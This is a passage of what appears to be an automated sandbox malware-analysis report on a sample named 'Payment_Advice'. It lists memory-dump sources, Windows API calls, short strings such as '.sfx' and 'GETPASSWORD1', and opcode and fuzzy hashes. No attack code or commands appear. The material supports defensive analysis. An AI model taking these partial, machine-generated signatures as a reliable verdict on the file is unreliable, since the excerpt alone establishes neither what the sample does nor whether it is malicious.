                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$_wcsrchr
                                                                                                    • String ID: .exe$.rar$.sfx
                                                                                                    • API String ID: 3513545583-31770016
                                                                                                    • Opcode ID: 6209e8143488dee1bafaad4b16f3709190b1173d30ae9c52bd4073c8d5ff42f1
                                                                                                    • Instruction ID: b6a0720744e9a6d5bbe7c7e48ea6e82a71632fdd593390e7db59f544d9bd2229
                                                                                                    • Opcode Fuzzy Hash: 6209e8143488dee1bafaad4b16f3709190b1173d30ae9c52bd4073c8d5ff42f1
                                                                                                    • Instruction Fuzzy Hash: 85411826540312A5D731AF74885AA7F7FA8FF82744F144A4EF9C26B5C1EB904EC2C395
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • _wcslen.LIBCMT ref: 0050BB27
                                                                                                    • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0050A275,?,?,00000800,?,0050A23A,?,0050755C), ref: 0050BBC5
                                                                                                    • _wcslen.LIBCMT ref: 0050BC3B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$CurrentDirectory
                                                                                                    • String ID: UNC$\\?\
                                                                                                    • API String ID: 3341907918-253988292
                                                                                                    • Opcode ID: a06cc48530d599d0ed5c8e950f288f0d60729463127e89b8de1f3768381d1baa
                                                                                                    • Instruction ID: 9f8e6b4a8e59d0001a11d968fff3ab5827324108dba4c44a5fa7dde4e0b64b24
                                                                                                    • Opcode Fuzzy Hash: a06cc48530d599d0ed5c8e950f288f0d60729463127e89b8de1f3768381d1baa
                                                                                                    • Instruction Fuzzy Hash: 4F417131840217A6FF21AF60CC89EEE7FA9BF85390F144465F855A71D1DBB4DED08A50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0051CD84
                                                                                                      • Part of subcall function 0051AF98: _wcschr.LIBVCRUNTIME ref: 0051B033
                                                                                                      • Part of subcall function 00511FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0050C116,00000000,.exe,?,?,00000800,?,?,?,00518E3C), ref: 00511FD1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcschr$CompareString
                                                                                                    • String ID: <$HIDE$MAX$MIN
                                                                                                    • API String ID: 69343711-3358265660
                                                                                                    • Opcode ID: 0ba77cd4349032349db9fe4825995909603c01758e54a15c5e4f85c4024a3f1d
                                                                                                    • Instruction ID: 5a256ec320e241952456a00f82b5ec5da24cc15383c853eaf7b3253a894e1a25
                                                                                                    • Opcode Fuzzy Hash: 0ba77cd4349032349db9fe4825995909603c01758e54a15c5e4f85c4024a3f1d
                                                                                                    • Instruction Fuzzy Hash: 2F31A5769406099AEF26CB50CC45EEE7FBCFB55350F404566E501E7180EBB19EC48FA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 0051AAD2
                                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 0051AB01
                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 0051AB99
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ObjectRelease
                                                                                                    • String ID: -Q$7Q
                                                                                                    • API String ID: 1429681911-1037005211
                                                                                                    • Opcode ID: a93618839cc309f66ce6c4f069fd3f2db34c4d7b6da116c2732d009656a4895a
                                                                                                    • Instruction ID: 8e24d7c1b247325a41bce9b3a1030c6a4831676a0fef37eae7d85cebf4e57918
                                                                                                    • Opcode Fuzzy Hash: a93618839cc309f66ce6c4f069fd3f2db34c4d7b6da116c2732d009656a4895a
                                                                                                    • Instruction Fuzzy Hash: F7210A72108304FFD3019FA9DD4CE6FBFE9FB99265F040829FA4592220D6719A5C9B62
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • _swprintf.LIBCMT ref: 0050B9B8
                                                                                                      • Part of subcall function 00504092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 005040A5
                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0050B9D6
                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0050B9E6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                                    • String ID: %c:\
                                                                                                    • API String ID: 525462905-3142399695
                                                                                                    • Opcode ID: dd2ee7ccc6cfeb5a10347db92007539bd3f4da99dd3ea5aef7c8fa717150b94e
                                                                                                    • Instruction ID: c79f50c5ec19e52c2fe4e6d453463ba075cc126bcf54300808233b8a7ca2097c
                                                                                                    • Opcode Fuzzy Hash: dd2ee7ccc6cfeb5a10347db92007539bd3f4da99dd3ea5aef7c8fa717150b94e
                                                                                                    • Instruction Fuzzy Hash: 1D01D667600313B5EA306B259CCAD6FAF9CFFD6770B844C0AF544D60C2EB24D85482B1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 00501316: GetDlgItem.USER32(00000000,00003021), ref: 0050135A
                                                                                                      • Part of subcall function 00501316: SetWindowTextW.USER32(00000000,005335F4), ref: 00501370
                                                                                                    • EndDialog.USER32(?,00000001), ref: 0051B2BE
                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0051B2D6
                                                                                                    • SetDlgItemTextW.USER32(?,00000067,?), ref: 0051B304
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                    • String ID: GETPASSWORD1$xzU
                                                                                                    • API String ID: 445417207-150693504
                                                                                                    • Opcode ID: 96f5669b761a249bd8a99c4e15f45523d0e16fcc41054bcff466626a69aac539
                                                                                                    • Instruction ID: d4ed1fd5816ba5c0bc168f8118ae95604962550f5e4306a153991680cc2dabcc
                                                                                                    • Opcode Fuzzy Hash: 96f5669b761a249bd8a99c4e15f45523d0e16fcc41054bcff466626a69aac539
                                                                                                    • Instruction Fuzzy Hash: 3711E132900119B6FB219A689D4EFFE3F6CFB59710F000820FA45B30C0C7B5AA999761
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • LoadBitmapW.USER32(00000065), ref: 0051B6ED
                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0051B712
                                                                                                    • DeleteObject.GDI32(00000000), ref: 0051B744
                                                                                                    • DeleteObject.GDI32(00000000), ref: 0051B767
                                                                                                      • Part of subcall function 0051A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0051B73D,00000066), ref: 0051A6D5
                                                                                                      • Part of subcall function 0051A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0051B73D,00000066), ref: 0051A6EC
                                                                                                      • Part of subcall function 0051A6C2: LoadResource.KERNEL32(00000000,?,?,?,0051B73D,00000066), ref: 0051A703
                                                                                                      • Part of subcall function 0051A6C2: LockResource.KERNEL32(00000000,?,?,?,0051B73D,00000066), ref: 0051A712
                                                                                                      • Part of subcall function 0051A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0051B73D,00000066), ref: 0051A72D
                                                                                                      • Part of subcall function 0051A6C2: GlobalLock.KERNEL32(00000000,?,?,?,?,?,0051B73D,00000066), ref: 0051A73E
                                                                                                      • Part of subcall function 0051A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0051A7A7
                                                                                                      • Part of subcall function 0051A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0051A7C6
                                                                                                      • Part of subcall function 0051A6C2: GlobalFree.KERNEL32(00000000), ref: 0051A7CD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
                                                                                                    • String ID: ]
                                                                                                    • API String ID: 1428510222-3352871620
                                                                                                    • Opcode ID: 6a1dd74a11a0d26cdee4c56135f6a1d438e0a3a50ee7255855150a5d559342b7
                                                                                                    • Instruction ID: bbefc552ee39f39eaf221aa37a290c44e1b5bd4b1e1cfaa8156d8b023c7a6885
                                                                                                    • Opcode Fuzzy Hash: 6a1dd74a11a0d26cdee4c56135f6a1d438e0a3a50ee7255855150a5d559342b7
                                                                                                    • Instruction Fuzzy Hash: F001C436941202A7FB1277789D0DAFF7EBAFBC1762F050410F900A7295DF718D895262
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 00501316: GetDlgItem.USER32(00000000,00003021), ref: 0050135A
                                                                                                      • Part of subcall function 00501316: SetWindowTextW.USER32(00000000,005335F4), ref: 00501370
                                                                                                    • EndDialog.USER32(?,00000001), ref: 0051D64B
                                                                                                    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0051D661
                                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0051D675
                                                                                                    • SetDlgItemTextW.USER32(?,00000068), ref: 0051D684
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                    • String ID: RENAMEDLG
                                                                                                    • API String ID: 445417207-3299779563
                                                                                                    • Opcode ID: 5144de719a166d8d0a6dfafcfa6168e952edbd9d42ff8ac816c54b194ef3b656
                                                                                                    • Instruction ID: a7a0a8195bbfb8cf7ab6069edf62e95ee1ae5977167984f8fae759fafefdab1d
                                                                                                    • Opcode Fuzzy Hash: 5144de719a166d8d0a6dfafcfa6168e952edbd9d42ff8ac816c54b194ef3b656
                                                                                                    • Instruction Fuzzy Hash: FC01B533648314BAE2114F689D09FAB7F6DBBAAB02F110521F206A20D1C7A29D4CE775
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00527E24,?,?,00527DC4,?,0053C300,0000000C,00527F1B,?,00000002), ref: 00527E93
                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00527EA6
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00527E24,?,?,00527DC4,?,0053C300,0000000C,00527F1B,?,00000002,00000000), ref: 00527EC9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                    • Opcode ID: 788368b17d702135ad74a0bdcf427f8b5f5c00241fab845bb58cf7e949ef1719
                                                                                                    • Instruction ID: dabb2d27196d0d5c34748637afeed2cfe668b63c1fe850f73ed220cb86b87688
                                                                                                    • Opcode Fuzzy Hash: 788368b17d702135ad74a0bdcf427f8b5f5c00241fab845bb58cf7e949ef1719
                                                                                                    • Instruction Fuzzy Hash: 69F04435904218BBDB159BA4DC49B9EBFB8FF45711F0180A9F805A22A0DB349E44DAA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 0051081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00510836
                                                                                                      • Part of subcall function 0051081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0050F2D8,Crypt32.dll,00000000,0050F35C,?,?,0050F33E,?,?,?), ref: 00510858
                                                                                                    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0050F2E4
                                                                                                    • GetProcAddress.KERNEL32(005481C8,CryptUnprotectMemory), ref: 0050F2F4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                    • API String ID: 2141747552-1753850145
                                                                                                    • Opcode ID: d5e12f0f007d80a7a59f9c8d8b1e3bfab808fcd4e11ce22a86e6e66ff48b86b5
                                                                                                    • Instruction ID: 98918e856fd274eb18b6c1e1939d0a9e1a281b039954d3e29bc75df16a3449ce
                                                                                                    • Opcode Fuzzy Hash: d5e12f0f007d80a7a59f9c8d8b1e3bfab808fcd4e11ce22a86e6e66ff48b86b5
                                                                                                    • Instruction Fuzzy Hash: B6E08C70910702AEDB309F78994DB46BFD47F14710F14882DF0DAE3A90EAB8D5848B50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AdjustPointer$_abort
                                                                                                    • String ID:
                                                                                                    • API String ID: 2252061734-0
                                                                                                    • Opcode ID: 597354c5381d37c260dc1f4baaa3dd0f357ddbd421d3b280fbd3fd2ddac812c5
                                                                                                    • Instruction ID: 2767cd1f8576a5b5b1b8db1bdbe0f284c27a013a8c4a1d923e52db6eae83d75e
                                                                                                    • Opcode Fuzzy Hash: 597354c5381d37c260dc1f4baaa3dd0f357ddbd421d3b280fbd3fd2ddac812c5
                                                                                                    • Instruction Fuzzy Hash: 1451DF7A601222BFDB298F14E849BAA7FA4FF56310F24442DEC01576E1D771ED81DB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0052BF39
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0052BF5C
                                                                                                      • Part of subcall function 00528E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00524286,?,0000015D,?,?,?,?,00525762,000000FF,00000000,?,?), ref: 00528E38
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0052BF82
                                                                                                    • _free.LIBCMT ref: 0052BF95
                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0052BFA4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 336800556-0
                                                                                                    • Opcode ID: ee1cc4f6f7600ceb0c05113a65af62511a419388247ce2a65e37210819731085
                                                                                                    • Instruction ID: d2a08938f647d28cb6b9c0c09ee4004245cfd39c61494c345041baf7d3833a44
                                                                                                    • Opcode Fuzzy Hash: ee1cc4f6f7600ceb0c05113a65af62511a419388247ce2a65e37210819731085
                                                                                                    • Instruction Fuzzy Hash: 8A017CA2606A267F33211ABA7D8DC7B6F6DFEC3BA13150129F904D2281FF608D01D5B0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,?,005291AD,0052B188,?,00529813,00000001,00000364,?,005240EF,?,?,00541098), ref: 0052986E
                                                                                                    • _free.LIBCMT ref: 005298A3
                                                                                                    • _free.LIBCMT ref: 005298CA
                                                                                                    • SetLastError.KERNEL32(00000000,?,00541098), ref: 005298D7
                                                                                                    • SetLastError.KERNEL32(00000000,?,00541098), ref: 005298E0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 3170660625-0
                                                                                                    • Opcode ID: 0b6358481315d27a0f2a266a60647fcbb995a08cb699e0c86eabee068e391864
                                                                                                    • Instruction ID: 8100538897af244bb220c9b82b13cad749d411c13faa6af30948cc9905ccb12f
                                                                                                    • Opcode Fuzzy Hash: 0b6358481315d27a0f2a266a60647fcbb995a08cb699e0c86eabee068e391864
                                                                                                    • Instruction Fuzzy Hash: 3301D1371446326BD3162274BC8D92A2E69FFE3760F290538F505923D2FE308C0A6121
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 005111CF: ResetEvent.KERNEL32(?), ref: 005111E1
                                                                                                      • Part of subcall function 005111CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 005111F5
                                                                                                    • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00510F21
                                                                                                    • CloseHandle.KERNEL32(?,?), ref: 00510F3B
                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 00510F54
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00510F60
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00510F6C
                                                                                                      • Part of subcall function 00510FE4: WaitForSingleObject.KERNEL32(?,000000FF,00511101,?,?,0051117F,?,?,?,?,?,00511169), ref: 00510FEA
                                                                                                      • Part of subcall function 00510FE4: GetLastError.KERNEL32(?,?,0051117F,?,?,?,?,?,00511169), ref: 00510FF6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
